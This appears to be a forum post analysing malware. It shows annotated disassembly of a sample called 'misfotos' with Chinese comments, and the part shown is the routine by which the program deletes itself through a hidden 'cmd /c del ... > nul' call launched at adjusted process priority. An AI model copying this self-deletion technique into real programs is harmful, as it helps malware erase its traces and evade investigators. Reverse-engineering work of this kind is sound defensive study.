004040A3 83C4 0C ADD ESP,0C
004040A6 68 04010000 PUSH 104 /maxlen = 104 (260.)
004040AB 68 489E4000 PUSH misfotos.00409E48 ; |src = " > nul"
004040B0 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208]
004040B6 50 PUSH EAX ; |dest = "/c del C:\DOCUME~1\CODERU~1\桌面\VIRUS.EXE"
004040B7 E8 722F0000 CALL misfotos.0040702E ; JMP 到 msvcrt.strncat
004040BC 83C4 0C ADD ESP,0C
004040BF C785 BCFDFFFF 3>MOV DWORD PTR SS:[EBP-244],3C
004040C9 83A5 C4FDFFFF 0>AND DWORD PTR SS:[EBP-23C],0
004040D0 C785 C8FDFFFF 5>MOV DWORD PTR SS:[EBP-238],misfotos.0040>; open
004040DA 8D85 B8FCFFFF LEA EAX,DWORD PTR SS:[EBP-348]
004040E0 8985 CCFDFFFF MOV DWORD PTR SS:[EBP-234],EAX
004040E6 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208]
004040EC 8985 D0FDFFFF MOV DWORD PTR SS:[EBP-230],EAX
004040F2 83A5 D4FDFFFF 0>AND DWORD PTR SS:[EBP-22C],0
004040F9 83A5 D8FDFFFF 0>AND DWORD PTR SS:[EBP-228],0
00404100 C785 C0FDFFFF 4>MOV DWORD PTR SS:[EBP-240],40
0040410A 68 00010000 PUSH 100
0040410F FF15 C8804000 CALL DWORD PTR DS:[4080C8] ; kernel32.GetCurrentProcess
00404115 50 PUSH EAX ; hProcess = FFFFFFFF
00404116 FF15 C4804000 CALL DWORD PTR DS:[4080C4] ; kernel32.SetPriorityClass
0040411C 6A 0F PUSH 0F
0040411E FF15 C0804000 CALL DWORD PTR DS:[4080C0] ; kernel32.GetCurrentThread
00404124 50 PUSH EAX
00404125 FF15 BC804000 CALL DWORD PTR DS:[4080BC] ; kernel32.SetThreadPriority
0040412B 8D85 BCFDFFFF LEA EAX,DWORD PTR SS:[EBP-244]
00404131 50 PUSH EAX
00404132 FF15 78814000 CALL DWORD PTR DS:[408178] ; SHELL32.ShellExecuteExA(调用运行控制台程序执行命令).
00404138 6A 40 PUSH 40 ; Priority = IDLE_PRIORITY_CLASS
0040413A FFB5 F4FDFFFF PUSH DWORD PTR SS:[EBP-20C]
00404140 FF15 C4804000 CALL DWORD PTR DS:[4080C4] ; kernel32.SetPriorityClass
00404146 6A 01 PUSH 1
00404148 FFB5 F4FDFFFF PUSH DWORD PTR SS:[EBP-20C]
0040414E FF15 B8804000 CALL DWORD PTR DS:[4080B8] ; kernel32.SetProcessPriorityBoost
00404154 6A 00 PUSH 0
00404156 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
0040415C 50 PUSH EAX
0040415D 6A 01 PUSH 1
0040415F 6A 04 PUSH 4
00404161 FF15 70814000 CALL DWORD PTR DS:[408170] ; SHELL32.SHChangeNotify
00404167 6A 00 PUSH 0 ; /status = 0
00404169 E8 22300000 CALL misfotos.00407190 ; JMP 到 msvcrt.exit(关闭退出).
0040416E C9 LEAVE
0040416F C3 RETN ; 返回.
----------------------------------------------------------
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
看原图
赞赏
雪币:
留言: